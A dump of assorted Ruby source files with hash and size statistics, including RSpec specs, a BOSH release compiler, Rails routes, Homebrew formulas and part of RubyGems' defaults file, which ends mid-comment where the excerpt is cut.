2876aecb44c49b16e41348e2d5c87363c3ebbd2d | 336 | # -*- coding: utf-8 -*- #
# frozen_string_literal: true
describe Rouge::Lexers::Stan do
  # NOTE: deliberately shadows RSpec's implicit subject with a lexer instance.
  let(:subject) { Rouge::Lexers::Stan.new }

  describe 'guessing' do
    include Support::Guessing

    it 'guesses by filename' do
      # Both Stan model files and standalone function files map to this lexer.
      assert_guess :filename => 'foo.stan'
      assert_guess :filename => 'foo.stanfunctions'
    end
  end
end
| 19.764706 | 51 | 0.657738 |
21d83e36df91fa9fda87e2330a042530c3a9e5ed | 625 | module DataAbstraction::SensorData
# Rain accumulation reading: an amount of rain (default unit "mm") measured
# over a duration (default unit seconds).
# NOTE(review): class name is misspelled ("Accumlation") but is part of the
# public interface -- renaming would break callers/serialized type names.
class RainAccumlation < Generic
  STANDARD_UNIT = "mm"

  # data        - hash with 'value', 'duration' and optional 'duration_unit'
  # meta_values - passed through to Generic
  # unit        - unit of the accumulation value (defaults to STANDARD_UNIT)
  def initialize(data, meta_values = {}, unit = STANDARD_UNIT)
    super(data, meta_values, unit)
    @value = DimensionValue.new(data['value'].to_f, @unit)
    duration_unit = data['duration_unit'] || "s" # seconds unless specified
    @duration = DurationValue.new(data['duration'].to_f, duration_unit)
  end

  def self.unit_class
    DimensionValue
  end

  def self.standard_unit
    STANDARD_UNIT
  end

  # Serializes like Generic, adding the measurement duration and its unit.
  def to_hash
    super.tap do |serialized|
      serialized['data']['duration'] = @duration.value
      serialized['data']['duration_unit'] = @duration.unit
    end
  end
end
end
| 27.173913 | 89 | 0.6432 |
bf2299573825bdd58f601b9a8e75be5fc8bd6569 | 8,309 | module Bosh
module Release
# Compiles a BOSH release against a locally running BOSH agent and applies
# the resulting spec (micro-BOSH style workflow).
#
# The command to run ("compile" or "apply") is taken from options["command"]
# and dispatched by #start.
class Compiler
  include Bosh::Common::PropertyHelper

  # Defaults merged under the caller-supplied options in #initialize.
  OPTIONS = {
    "blobstore_options" => { "blobstore_path" => "/var/vcap/micro_bosh/data/cache" },
    "blobstore_provider" => "local",
    "base_dir" => "/var/vcap",
    "platform_name" => "ubuntu",
    "agent_uri" => "https://vcap:vcap@localhost:6969"
  }

  # Number of ping attempts made while waiting for the agent to come up.
  AGENT_START_RETRIES=16

  # options - Hash; see OPTIONS for defaults. Expected keys include
  #           "command", "manifest", "release", :job, :cpi and "logfile".
  def initialize(options)
    @options = OPTIONS.merge(options)
    @logger = Logger.new(@options["logfile"] || STDOUT)

    FileUtils.mkdir_p(File.join(@options["base_dir"], "packages"))

    bsc_provider = @options["blobstore_provider"]
    bsc_options = @options["blobstore_options"]
    @logger.info("Creating Blobstore client with #{bsc_provider} provider and options #{bsc_options}")
    @blobstore_client = Bosh::Blobstore::Client.safe_create(bsc_provider, bsc_options)
  end

  # Dispatches to #compile or #apply based on options["command"].
  def start
    # Start the "compile" or "apply"
    send(@options["command"].to_sym)
  end

  # Path where the generated apply spec is persisted between the compile
  # and apply phases.
  def apply_spec
    File.join(@options["base_dir"], "micro/apply_spec.yml")
  end

  # Pings the agent until it responds, retrying up to AGENT_START_RETRIES
  # times before re-raising the connection error.
  def connect_to_agent
    num_tries = 0
    begin
      @agent = Bosh::Agent::Client.create(@options["agent_uri"], "user" => "vcap", "password" => "vcap")
      @agent.ping
    rescue => e
      num_tries += 1
      sleep 0.1
      # Dont retry forever
      retry if num_tries < AGENT_START_RETRIES
      @logger.warn("Error connecting to agent #{e.inspect}")
      raise
    end
  end

  # Compiles all packages needed by the requested job(s) out of the release
  # tarball, builds the apply spec and saves it to #apply_spec.
  #
  # Returns the compiled package map, or nil when compilation failed (the
  # error is only logged; callers must treat a nil result as failure).
  def compile
    @logger.info("Compiling #{@options["manifest"]} with tarball #{@options["release"]}")
    connect_to_agent
    deployment_mf = Psych.load_file(File.expand_path(@options["manifest"]))
    @spec = prep_spec(deployment_mf)
    @packages = {}
    @spec["job"] = { "name" => @options[:job] }
    untar(@options["release"]) do |dir|
      release_mf = Psych.load_file("release.MF")
      jobs = []
      jobs_to_compile(@options[:job], deployment_mf).each do |spec_job|
        job = find_by_name(release_mf["jobs"], spec_job)
        job_path = File.expand_path("jobs/#{job["name"]}.tgz")
        jobs << apply_spec_job(job, job_path)

        # The requested main job additionally stamps its identity onto the
        # apply spec.
        if job["name"] == @options[:job]
          @spec["job"]["version"] = job["version"].to_s
          @spec["job"]["template"] = @options[:job]
          @spec["job"]["sha1"] = job["sha1"]
          @spec["job"]["blobstore_id"] = @blobstore_client.create(File.new(job_path))
        end

        untar(job_path) do
          # Renamed from `job` to avoid shadowing the release job above.
          job_mf = Psych.load_file("job.MF")
          # add default job spec properties to apply spec
          add_default_properties(@spec["properties"], job_mf["properties"])
          # Compile job packages
          compile_packages(dir, release_mf, job_mf["packages"])
        end
      end
      @spec["job"]["templates"] = jobs
    end

    cleanup

    # save apply spec
    FileUtils.mkdir_p(File.dirname(apply_spec))
    File.open(apply_spec, 'w') { |f| f.write(Psych.dump(@spec)) }

    @spec["packages"]
  rescue => e
    # NOTE: errors are swallowed by design here -- the failure is logged and
    # the method falls through returning nil.
    @logger.error("Error #{e.message}, #{e.backtrace.join("\n")}")
  end

  # Finds the entry with "name" == name in an array of hashes; raises when
  # it is missing.
  def find_by_name(enum, name)
    result = enum.find { |j| j["name"] == name }
    if result
      result
    else
      raise "Could not find name #{name} in #{enum}"
    end
  end

  # Check manifest for job collocation: returns the template list of the
  # named job from the manifest, or just [name] when not defined there.
  def jobs_to_compile(name, manifest)
    compile_job = manifest["jobs"].find { |j| j["name"] == name } if manifest["jobs"]
    if compile_job
      compile_job["template"]
    else
      [name]
    end
  end

  # Uploads the job tarball and returns its apply-spec template entry.
  def apply_spec_job(job, job_path)
    {
      "name" => job["name"],
      "version" => job["version"].to_s,
      "sha1" => job["sha1"],
      "blobstore_id" => @blobstore_client.create(File.new(job_path))
    }
  end

  # Removes temporary compile state from the base dir.
  def cleanup
    FileUtils.rm_rf("#{@options["base_dir"]}/data/compile")
    FileUtils.rm_rf("#{@options["base_dir"]}/data/packages")
    FileUtils.rm_rf("#{@options["base_dir"]}/data/tmp")
    FileUtils.rm_rf("#{@options["base_dir"]}/packages")
  end

  # Builds the skeleton apply spec from the deployment manifest, including
  # the CPI-specific network block.
  def prep_spec(deployment)
    spec = {}
    spec["deployment"] = "micro"
    spec["release"] = deployment["release"]
    spec["properties"] = deployment["properties"]
    spec["index"] = 0
    spec["packages"] = {}
    spec["configuration_hash"] = {}

    case @options[:cpi]
    when "vsphere", "vcloud"
      spec["networks"] = {"local" => {"ip" => "127.0.0.1"}}
    when "aws"
      spec["networks"] = {"type" => "dynamic"}
    when "openstack"
      spec["networks"] = {"type" => "dynamic"}
    else
      puts "WARNING: no CPI specified"
    end

    spec
  end

  # Depth-first compiles a package list, dependencies before dependents.
  def compile_packages(dir, manifest, packages)
    packages.each do |name|
      package = find_package(manifest, name)
      compile_packages(dir, manifest, package["dependencies"]) if package["dependencies"]

      @logger.debug "compiling package #{name}"
      compile_package(dir, package, name)
    end
  end

  def find_package(manifest, name)
    manifest["packages"].detect { |p| p["name"] == name }
  end

  # Uploads one source package, has the agent compile it against its
  # already-compiled dependencies, then records the compiled blob in the
  # spec. No-op when the package was already compiled this run.
  def compile_package(dir, package, name)
    # return if package is already compiled
    return if @spec["packages"].has_key?(name)

    src = "#{dir}/packages/#{name}.tgz"
    version = package["version"]

    # push source package into blobstore
    file = File.new(src)
    id = @blobstore_client.create(file)

    # The agent does not verify the source sha1 in this flow, so a
    # placeholder is passed.
    sha1 = "sha1"

    # (A dead reassignment of `dependencies` from package["dependencies"]
    # was removed here; the hash below is what the agent consumes.)
    dependencies = {}
    package["dependencies"].each do |dep_name|
      @logger.debug "dependency: #{dep_name} = #{@spec["packages"][dep_name]}"
      dependencies[dep_name] = @spec["packages"][dep_name]
    end

    result = @agent.run_task(:compile_package, id, sha1, name, version, dependencies)
    @logger.info("result is #{result}")

    # remove source package from blobstore
    @blobstore_client.delete(id)

    id = result["result"]["blobstore_id"]
    @logger.debug("stored package #{name} as #{id}")

    @spec["packages"][name] = {
      "name" => name,
      "version" => version.to_s,
      "sha1" => result["result"]["sha1"],
      "blobstore_id" => id
    }
  end

  # Extracts a tarball into a temp dir, yields that dir with the CWD
  # switched into it, and always restores the CWD and removes the temp dir.
  def untar(file)
    prev_dir = Dir.getwd
    dir = Dir.mktmpdir
    Dir.chdir(dir)
    @logger.debug("untaring #{file} into #{dir}")
    out = `tar xzf #{file} 2>&1`
    raise RuntimeError, "untar of #{file} failed: #{out}" unless $?.success?
    yield dir
  ensure
    Dir.chdir(prev_dir)
    FileUtils.rm_rf dir
  end

  # Applies the previously generated apply spec: stops services, rewrites
  # addresses in the spec, applies it, then starts services again.
  def apply
    connect_to_agent
    FileUtils.mkdir_p(File.join(@options["base_dir"], 'data/log'))

    # Stop services
    @logger.info("Stopping services")
    begin
      @agent.run_task(:stop)
    rescue => e
      @logger.warn("Ignoring error to stop services #{e.inspect}")
    end

    @spec = Psych.load_file(@options["apply_spec"])
    @logger.info("#{@spec.inspect}")
    update_bosh_spec
    @agent.run_task(:apply, @spec)

    @logger.info("Starting services")
    @agent.run_task(:start)
  end

  # Rewrites the component addresses in the spec to the agent's host.
  def update_bosh_spec
    uri = URI.parse(@options["agent_uri"])
    ip = uri.host
    properties = @spec["properties"]
    properties["blobstore"]["address"] = ip
    properties["postgres"]["address"] = ip
    properties["director"]["address"] = ip
    properties["redis"]["address"] = ip
    properties["nats"]["address"] = ip
    @spec["properties"] = properties
  end

  # Copies each job property's default (when present) into the spec
  # properties without overwriting values already set.
  def add_default_properties(spec_properties, job_properties)
    return unless job_properties

    job_properties.each_pair do |name, definition|
      unless definition["default"].nil?
        copy_property(spec_properties, spec_properties, name, definition["default"])
      end
    end
  end
end
end
end
| 31.11985 | 108 | 0.55807 |
62d873b2eb860e985d5c3f87eef051de6116bb3c | 832 | Rails.application.routes.draw do
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
root 'static_page#home'
# root to: 'static_page#home' # 上記はこれの省略形
get '/policy', to: 'static_page#policy'
get '/development', to: 'static_page#development'
get '/about', to: 'static_page#about'
get '/privacy', to: 'static_page#privacy'
# 参考に残しておく
get '/team', to: 'static_page#team'
get '/testimonials', to: 'static_page#testimonials'
get '/services', to: 'static_page#services'
get '/portfolio', to: 'static_page#portfolio'
get '/portfolio-details', to: 'static_page#portfolio_details'
get '/pricing', to: 'static_page#pricing'
get '/blog', to: 'static_page#blog'
get '/blog-single', to: 'static_page#blog_single'
get '/contact', to: 'static_page#contact'
end
| 37.818182 | 102 | 0.709135 |
d5856444904ddfce5fec0c570151f3eca0617ca8 | 749 | require File.expand_path(File.dirname(__FILE__) + '/edgecase')
# Koan exploring Ruby's truthiness rules. The `__` placeholders are meant
# to be filled in by the student (defined in the edgecase helper).
class AboutTrueAndFalse < EdgeCase::Koan
  # Maps a condition's truthiness onto a symbol so the tests below can
  # assert on which branch was taken.
  def truth_value(condition)
    if condition
      :true_stuff
    else
      :false_stuff
    end
  end

  def test_true_is_treated_as_true
    assert_equal __, truth_value(true)
  end

  def test_false_is_treated_as_false
    assert_equal __, truth_value(false)
  end

  # nil is the only other falsy value in Ruby.
  def test_nil_is_treated_as_false_too
    assert_equal __, truth_value(nil)
  end

  # Unlike many languages, 0, "", [] and {} are all truthy in Ruby.
  def test_everything_else_is_treated_as_true
    assert_equal __, truth_value(1)
    assert_equal __, truth_value(0)
    assert_equal __, truth_value([])
    assert_equal __, truth_value({})
    assert_equal __, truth_value("Strings")
    assert_equal __, truth_value("")
  end
end
| 22.029412 | 62 | 0.734312 |
ed2090324fcbfc1a4c9cab32a104a6b49b4c86cf | 327 | require 'rails_helper'
require Rails.root.join('spec', 'models', 'shared_examples', 'non_null_field.rb')
describe Bookmark do
subject { build( :bookmark ) }
it { should validate_presence_of :user_id }
it { should validate_presence_of :project_id }
it { should belong_to :user }
it { should belong_to :project }
end | 27.25 | 81 | 0.730887 |
d55d41fab85e45ee6b289a3d9e467bcd640be6de | 2,070 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ProjectFeatureUsage, type: :model do
  describe '.jira_dvcs_integrations_enabled_count' do
    it 'returns count of projects with Jira DVCS Cloud enabled' do
      create(:project).feature_usage.log_jira_dvcs_integration_usage
      create(:project).feature_usage.log_jira_dvcs_integration_usage

      expect(described_class.with_jira_dvcs_integration_enabled.count).to eq(2)
    end

    it 'returns count of projects with Jira DVCS Server enabled' do
      # cloud: false selects the self-hosted (Server) sync column.
      create(:project).feature_usage.log_jira_dvcs_integration_usage(cloud: false)
      create(:project).feature_usage.log_jira_dvcs_integration_usage(cloud: false)

      expect(described_class.with_jira_dvcs_integration_enabled(cloud: false).count).to eq(2)
    end
  end

  describe '#log_jira_dvcs_integration_usage' do
    let(:project) { create(:project) }

    subject { project.feature_usage }

    # Timecop.freeze pins Time.current so be_like_time comparisons are exact.
    it 'logs Jira DVCS Cloud last sync' do
      Timecop.freeze do
        subject.log_jira_dvcs_integration_usage

        expect(subject.jira_dvcs_server_last_sync_at).to be_nil
        expect(subject.jira_dvcs_cloud_last_sync_at).to be_like_time(Time.current)
      end
    end

    it 'logs Jira DVCS Server last sync' do
      Timecop.freeze do
        subject.log_jira_dvcs_integration_usage(cloud: false)

        expect(subject.jira_dvcs_server_last_sync_at).to be_like_time(Time.current)
        expect(subject.jira_dvcs_cloud_last_sync_at).to be_nil
      end
    end

    context 'when log_jira_dvcs_integration_usage is called simultaneously for the same project' do
      # Simulates two processes logging for the same row: the later write
      # (via a second model instance) must win after reload.
      it 'logs the latest call' do
        feature_usage = project.feature_usage
        feature_usage.log_jira_dvcs_integration_usage

        first_logged_at = feature_usage.jira_dvcs_cloud_last_sync_at

        travel_to(1.hour.from_now) do
          ProjectFeatureUsage.new(project_id: project.id).log_jira_dvcs_integration_usage
        end

        expect(feature_usage.reload.jira_dvcs_cloud_last_sync_at).to be > first_logged_at
      end
    end
  end
end
| 34.5 | 99 | 0.753623 |
28436548b97bb1861c43c3dbe0e415083a44f05f | 720 | Pod::Spec.new do |s|
s.name = "DFUDependence"
s.version = "2.8.2"
s.summary = "DFUDependence SDK for iOS. "
s.homepage = "https://github.com/ttlock/iOS_TTLock_Demo"
s.license = { :type => "MIT", :file => "LICENSE" }
s.author = { "ttlock" => "[email protected]" }
s.platform = :ios, "8.0"
s.source = { :git => "https://github.com/ttlock/iOS_TTLock_Demo.git", :tag => "#{s.version}" }
s.vendored_frameworks = "TTLockFrameworks/DFUDependence.framework"
s.preserve_paths = "TTLockFrameworks/DFUDependence.framework"
s.library = "z"
s.requires_arc = true
s.xcconfig = { "ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES" => "YES","ENABLE_BITCODE" => "NO" }
end
| 40 | 101 | 0.622222 |
e87041e09d625c44220a3795c0ee1a848dcc13da | 984 | class Aescrypt < Formula
desc "Program for encryption/decryption"
homepage "http://aescrypt.sourceforge.net/"
url "http://aescrypt.sourceforge.net/aescrypt-0.7.tar.gz"
sha256 "7b17656cbbd76700d313a1c36824a197dfb776cadcbf3a748da5ee3d0791b92d"
bottle do
cellar :any_skip_relocation
sha256 "0cd940c7c9e59104746a8f83f92a06e703e7f98195a202d20516c03b588fd63f" => :el_capitan
sha256 "660c8a9266d7f85e699fb5bfabb82c508a66d303b2a2057c9c70a3c70fed43f6" => :yosemite
sha256 "a0bf8895165037991bf5b33be5c995e9b68a1d05898003a0ef45adb7aa3d3da9" => :mavericks
end
def install
system "./configure"
system "make"
bin.install "aescrypt", "aesget"
end
test do
(testpath/"key").write "kk=12345678901234567890123456789abc0"
require "open3"
Open3.popen3("#{bin}/aescrypt", "-k", testpath/"key") do |stdin, stdout, _|
stdin.write("hello")
stdin.close
# we can't predict the output
stdout.read.length > 0
end
end
end
| 30.75 | 92 | 0.738821 |
bf7fd7bd5df04564713c8c3cdf9e2b7c30c30338 | 9,054 | module MuckFriendsHelper
def all_friends(user)
render :partial => 'friends/all_friends', :locals => { :user => user }
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user1: User whose friends are to be shown
# user2: User whose friends are to be checked to see if they are in common with user1
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def mutual_friends(user1, user2, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user1.blank? || user2.blank?
users = user1.friends & user2.friends
users = users.first(limit)
no_friends_content ||= t('muck.friends.no_mutual_friends')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def friends(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.blank?
users = user.friends.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.no_friends')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def followers(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.blank?
users = user.followers.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.no_followers')
render_friends(users, partial, no_friends_content)
end
# Renders a partial that contains the friends of the given user
# Parameters:
# user: User whose friends are to be shown
# limit: Number of records to show
# partial: The partial to render. Default is 'friend_simple' which renders an icon and name for each friend.
# Options include 'friend_icon' which only renders an icon or a custom partial. Place custom partials
# in app/views/friends
# no_friends_content: Content to render if no users are found. Pass ' ' to render nothing
def followings(user, limit = 6, no_friends_content = nil, partial = 'friend_simple')
return '' if user.nil?
users = user.followings.find(:all, :limit => limit, :order => 'friends.created_at DESC')
no_friends_content ||= t('muck.friends.not_following_anyone')
render_friends(users, partial, no_friends_content)
end
# Render a list of all friend requests (if !MuckFriends.configuration.enable_following)
def friend_requests(user)
if !MuckFriends.configuration.enable_following
followers = user.followers
render :partial => 'friends/friend_requests', :locals => { :followers => followers } unless followers.blank?
end
end
def block_user_link(user, target)
return '' if user.blank?
friend = user.friendship_with(target)
return '' if friend.blank?
dom_id = make_block_id(user, target)
if friend.blocked?
return wrap_friend_link(link_to( I18n.t('muck.friends.unblock', :user => target.display_name), user_friend_path(user, friend, :target_id => target, :unblock => true), :class => 'ajax-update'), dom_id, 'friendship-block')
else
return wrap_friend_link(link_to( I18n.t('muck.friends.block', :user => target.display_name), user_friend_path(user, friend, :target_id => target, :block => true), :class => 'ajax-update'), dom_id, 'friendship-block')
end
end
# Render a follow/unfollow/friend request link appropriate to the current application settings and user relationship
# Requires enable_following and enable_friending be set in configuration see README
# If enable_following is true and enable_friending is false then only follow/unfollow links will be shown
# If enable_following is false and enable_friending is true then only friend request and unfriend links will be shown
# If enable_following is true and enable_friending is true then a hybrid model will be used. Users can follow
# each other without permission but a mutual follow will result in a friendship. Defriending a user will result in the
# other user becoming a follower
def friend_link(user, target)
# User not logged in
if user.blank?
if MuckFriends.configuration.enable_following
key = 'login_or_sign_up_to_follow'
elsif MuckFriends.configuration.enable_friending
key = 'login_or_sign_up_to_friend'
else
return ''
end
return wrap_friend_link(I18n.t("muck.friends.#{key}", :login => link_to(t('muck.friends.login'), login_path), :signup => link_to(t('muck.friends.signup'), signup_path)))
end
return '' if target.blank?
return '' if user == target
dom_id = make_id(user, target)
if MuckFriends.configuration.enable_friending
if user.friend_of?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.stop_being_friends_with', :user => target.display_name), user_friend_path(user, target), :class => 'ajax-delete'), dom_id)
elsif user.following?(target)
return wrap_friend_link( I18n.t('muck.friends.friend_request_pending', :link => link_to(I18n.t('muck.friends.delete'), user_friend_path(user, target), :class => 'ajax-delete')), dom_id)
end
elsif MuckFriends.configuration.enable_following
if user.following?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.stop_following', :user => target.display_name), user_friend_path(user, target), :class => 'ajax-delete'), dom_id)
end
end
if MuckFriends.configuration.enable_friending && user.followed_by?(target)
return wrap_friend_link(link_to( I18n.t('muck.friends.acccept_friend_request', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
end
if MuckFriends.configuration.enable_following
wrap_friend_link(link_to( I18n.t('muck.friends.start_following', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
elsif MuckFriends.configuration.enable_friending
wrap_friend_link(link_to( I18n.t('muck.friends.friend_request_prompt', :user => target.display_name), user_friends_path(user, :id => target), :class => 'ajax-update'), dom_id)
end
end
def accept_follower_link(user, target)
dom_id = make_id(user, target)
wrap_friend_link(link_to( I18n.t('muck.friends.accept'), user_friends_path(user, target), :id => "accept-#{target.id}", :class => 'notification-link ajax-update'), dom_id)
end
def ignore_friend_request_link(user, target)
dom_id = make_id(user, target)
wrap_friend_link(link_to( I18n.t('muck.friends.ignore'), user_friend_path(user, target), :id => "ignore-#{target.id}", :class => 'notification-link ajax-delete'), dom_id)
end
protected
# Handles render friend partials
def render_friends(users, partial, no_friends_content)
if users.length > 0
render :partial => "friends/#{partial}", :collection => users
else
if no_friends_content.length > 0 # Do this so that a user can pass ' ' to get a blank string output
no_friends_content
else
"<p class=\"no_friends_found\">#{no_friends_content}</p>"
end
end
end
def wrap_friend_link(link, dom_id = '', css = 'friendship-description')
content_tag(:span, link, :id => dom_id, :class => css)
end
def make_id(user, target)
user.dom_id(target.dom_id + '_friendship_')
end
def make_block_id(user, target)
user.dom_id(target.dom_id + '_block_')
end
end | 51.443182 | 226 | 0.690082 |
b9941b6a72e1008164b1c7845e38dad044ee744e | 341 | # frozen_string_literal: true
require 'date'
require 'prometheus/client'
require_relative 'g'
# Gauge exporting today's Norwegian National Insurance base amount
# ("grunnbeløp") so it can be scraped by Prometheus.
grunnbeløp_gauge = Prometheus::Client::Gauge.new(:grunnbeloep, docstring: 'Dagens grunnbeloep')
grunnbeløp_gauge.set(Grunnbeløp.by_date(DateTime.now)[:grunnbeløp])

# Register with the default registry used by the exporter middleware.
prometheus = Prometheus::Client.registry
prometheus.register(grunnbeløp_gauge)
| 26.230769 | 95 | 0.815249 |
91a0a1b875ddf50cf05b162acb2469e182149e99 | 525 | class Prime::Chains::Ethereum < Prime::Chain
scope :enabled_for_staking, -> { where(eth2_staking_enabled: true) }
with_options if: :eth2_staking_enabled? do
validates :anjin_api_url, presence: true
validates :anjin_api_key, presence: true
validates :external_chain_id, presence: true, numericality: { only_integer: true }
end
def anjin_client(timeout: nil)
Prime::Anjin::Client.new(
anjin_api_url,
{
timeout: timeout,
authorization: anjin_api_key
}
)
end
end
| 26.25 | 86 | 0.691429 |
280672a40f4647a8ac21210cf4d8e4b6ca4b51dc | 1,527 | class Sysbench < Formula
desc "System performance benchmark tool"
homepage "https://github.com/akopytov/sysbench"
url "https://github.com/akopytov/sysbench/archive/1.0.20.tar.gz"
sha256 "e8ee79b1f399b2d167e6a90de52ccc90e52408f7ade1b9b7135727efe181347f"
license "GPL-2.0-or-later"
revision 1
head "https://github.com/akopytov/sysbench.git", branch: "master"
bottle do
sha256 cellar: :any, arm64_big_sur: "8f5fd6827291b2eb5f3a5b4c842a059182802d2ad97dcbd894046e5b2750914f"
sha256 cellar: :any, big_sur: "a9c638a46ddda6841018ad7354673315882a83e2aad7a480f46663db25e3c553"
sha256 cellar: :any, catalina: "f85e28b078ef05d9a155d0655275e6a9418494d94ab3dd524607a9c6ca84806b"
sha256 cellar: :any, mojave: "a29e37acd73943d5a1d72e6a5cb2f0812e2be3aeb061f919d271a8b31f2ac412"
sha256 cellar: :any_skip_relocation, x86_64_linux: "8f9cf704a34e18ddf2b4e826500a6b98b6e0df6e9b2dcf85e93dfe9f5fa2988f"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
depends_on "luajit-openresty"
depends_on "mysql-client"
depends_on "[email protected]"
uses_from_macos "vim" # needed for xxd
def install
system "./autogen.sh"
system "./configure", "--prefix=#{prefix}", "--with-mysql", "--with-system-luajit"
system "make", "install"
end
test do
system "#{bin}/sysbench", "--test=cpu", "--cpu-max-prime=1", "run"
end
end
| 40.184211 | 122 | 0.714473 |
21ee2796bd87b6888541cd3fdb1c7abded0da74a | 1,341 | # frozen_string_literal: true
require 'spec_helper'
describe 'Showing instance statistics' do
  before do
    sign_in user if user
  end

  # Using a path that is publicly accessible
  subject { visit explore_projects_path }

  context 'for unauthenticated users' do
    let(:user) { nil }

    it 'does not show the instance statistics link' do
      subject

      expect(page).not_to have_link('Instance Statistics')
    end
  end

  context 'for regular users' do
    let(:user) { create(:user) }

    context 'when instance statistics are publicly available' do
      before do
        stub_application_setting(instance_statistics_visibility_private: false)
      end

      it 'shows the instance statistics link' do
        subject

        expect(page).to have_link('Instance Statistics')
      end
    end

    context 'when instance statistics are not publicly available' do
      before do
        stub_application_setting(instance_statistics_visibility_private: true)
      end

      # Example name fixed: this context asserts the link is ABSENT, but the
      # example was previously titled 'shows the instance statistics link'.
      it 'does not show the instance statistics link' do
        subject

        expect(page).not_to have_link('Instance Statistics')
      end
    end
  end

  context 'for admins' do
    let(:user) { create(:admin) }

    # Admins always see the link regardless of the visibility setting.
    it 'shows the instance statistics link' do
      subject

      expect(page).to have_link('Instance Statistics')
    end
  end
end
| 21.983607 | 79 | 0.683072 |
62157bdce94072464a05b070ab6e4475b0d0b8c0 | 167 | class AddDeletedAtToInstances < ActiveRecord::Migration
def change
add_column :instances, :deleted_at, :datetime
add_index :instances, :deleted_at
end
end
| 23.857143 | 55 | 0.772455 |
33b6ab3f3e5cff1af86a7a6e1121c4d145c3ab9b | 4,852 | # frozen_string_literal: true
module Gem
DEFAULT_HOST = "https://rubygems.org".freeze
@post_install_hooks ||= []
@done_installing_hooks ||= []
@post_uninstall_hooks ||= []
@pre_uninstall_hooks ||= []
@pre_install_hooks ||= []
##
# An Array of the default sources that come with RubyGems
def self.default_sources
%w[https://rubygems.org/]
end
##
# Default spec directory path to be used if an alternate value is not
# specified in the environment
def self.default_spec_cache_dir
File.join Gem.user_home, '.gem', 'specs'
end
##
# Default home directory path to be used if an alternate value is not
# specified in the environment
def self.default_dir
path = if defined? RUBY_FRAMEWORK_VERSION
[
File.dirname(RbConfig::CONFIG['sitedir']),
'Gems',
RbConfig::CONFIG['ruby_version']
]
elsif RbConfig::CONFIG['rubylibprefix']
[
RbConfig::CONFIG['rubylibprefix'],
'gems',
RbConfig::CONFIG['ruby_version']
]
else
[
RbConfig::CONFIG['libdir'],
ruby_engine,
'gems',
RbConfig::CONFIG['ruby_version']
]
end
@default_dir ||= File.join(*path)
end
##
# Returns binary extensions dir for specified RubyGems base dir or nil
# if such directory cannot be determined.
#
# By default, the binary extensions are located side by side with their
# Ruby counterparts, therefore nil is returned
def self.default_ext_dir_for(base_dir)
nil
end
##
# Paths where RubyGems' .rb files and bin files are installed
def self.default_rubygems_dirs
nil # default to standard layout
end
##
# Path for gems in the user's home directory
def self.user_dir
parts = [Gem.user_home, '.gem', ruby_engine]
parts << RbConfig::CONFIG['ruby_version'] unless RbConfig::CONFIG['ruby_version'].empty?
File.join parts
end
##
# How String Gem paths should be split. Overridable for esoteric platforms.
def self.path_separator
File::PATH_SEPARATOR
end
##
# Default gem load path
def self.default_path
path = []
path << user_dir if user_home && File.exist?(user_home)
path << default_dir
path << vendor_dir if vendor_dir and File.directory? vendor_dir
path
end
##
# Deduce Ruby's --program-prefix and --program-suffix from its install name
def self.default_exec_format
exec_format = RbConfig::CONFIG['ruby_install_name'].sub('ruby', '%s') rescue '%s'
unless exec_format =~ /%s/
raise Gem::Exception,
"[BUG] invalid exec_format #{exec_format.inspect}, no %s"
end
exec_format
end
##
# The default directory for binaries
def self.default_bindir
if defined? RUBY_FRAMEWORK_VERSION # mac framework support
'/usr/bin'
else # generic install
RbConfig::CONFIG['bindir']
end
end
##
# A wrapper around RUBY_ENGINE const that may not be defined
def self.ruby_engine
if defined? RUBY_ENGINE
RUBY_ENGINE
else
'ruby'
end
end
##
# The default signing key path
def self.default_key_path
File.join Gem.user_home, ".gem", "gem-private_key.pem"
end
##
# The default signing certificate chain path
def self.default_cert_path
File.join Gem.user_home, ".gem", "gem-public_cert.pem"
end
##
# Install extensions into lib as well as into the extension directory.
def self.install_extension_in_lib # :nodoc:
true
end
##
# Directory where vendor gems are installed.
def self.vendor_dir # :nodoc:
if vendor_dir = ENV['GEM_VENDOR']
return vendor_dir.dup
end
return nil unless RbConfig::CONFIG.key? 'vendordir'
File.join RbConfig::CONFIG['vendordir'], 'gems',
RbConfig::CONFIG['ruby_version']
end
##
# Default options for gem commands for Ruby packagers.
#
# The options here should be structured as an array of string "gem"
# command names as keys and a string of the default options as values.
#
# Example:
#
# def self.operating_system_defaults
# {
# 'install' => '--no-rdoc --no-ri --env-shebang',
# 'update' => '--no-rdoc --no-ri --env-shebang'
# }
# end
def self.operating_system_defaults
{}
end
##
# Default options for gem commands, for use by Ruby implementers
# (alternative interpreters such as JRuby or TruffleRuby).
#
# The returned hash maps string "gem" command names to a string of
# default options, for example:
#
#   {
#     'install' => '--no-rdoc --no-ri --env-shebang',
#     'update'  => '--no-rdoc --no-ri --env-shebang'
